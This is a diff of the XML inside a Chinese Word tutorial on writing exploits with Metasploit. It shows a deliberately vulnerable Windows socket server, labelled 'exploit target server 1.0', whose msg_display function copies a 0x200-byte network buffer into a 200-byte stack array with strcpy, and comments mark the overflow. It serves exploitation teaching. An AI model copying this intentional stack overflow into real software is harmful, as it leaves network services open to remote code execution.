--- a/第四章 用MetaSploit开发Exploit/2.开发自己的Exploit.docx
+++ b/第四章 用MetaSploit开发Exploit/2.开发自己的Exploit.docx
@@ -155,7 +155,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>#pragma comment(lib, "ws2_32.lib")</w:t>
+        <w:t xml:space="preserve">#pragma </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>comment(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>lib, "ws2_32.lib")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -164,11 +172,1007 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:t>msg_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>display</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">char * </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">char </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>msg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>200];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>msg,buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>);// overflow here, copy 0x200 to 200</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;"********************"&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;"received:"&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">void </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>main(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>sock,msgsock</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>,lenth,receive_len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sockaddr_in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sock_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>server,sock</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_client</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">char </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>[0x200]; //noticed it is 0x200</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">WSADATA </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wsa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WSAStartup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(MAKEWORD(1,1</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>),&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>wsa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>if((sock=socket(AF_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INET,SOCK</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_STREAM,0))&lt;0)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;sock&lt;&lt;"socket creating error!"&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>exit(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>1);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sock_server.sin_family</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=AF_INET;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sock_server.sin_port</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>htons</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>7777);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sock_server.sin_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>addr.s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>htonl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(INADDR_ANY);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>if(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>bind(sock,(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sockaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>*)&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sock_server,sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sock_server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;"binging stream socket error!"&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;"**************************************"&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;"     exploit target server 1.0</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">   "&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;"**************************************"&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>listen(sock,4);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lenth</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sockaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>do{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msgsock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>accept(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>sock,(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sockaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>*)&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sock_client</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>,(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>*)&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lenth</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>if(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msgsock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>==-1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;&lt;"accept error!"&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>break;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">else </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>do</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>memset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(buf,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>0,sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>if((</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>receive_len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>recv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>msgsock,buf</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>,sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>),0))&lt;0)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">&lt;&lt;"reading stream message </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>erro</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>!"&lt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>receive_len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">=0; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:t>msg_display</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">(char * </w:t>
+        <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -176,233 +1180,30 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">char </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>[200];</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>strcpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>);//trigged the overflow</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>}while</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>msg,buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);// overflow here, copy 0x200 to 200</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;"********************"&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;"received:"&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>void main()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>int</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sock,msgsock,lenth,receive_len</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sockaddr_in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sock_server,sock_client</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
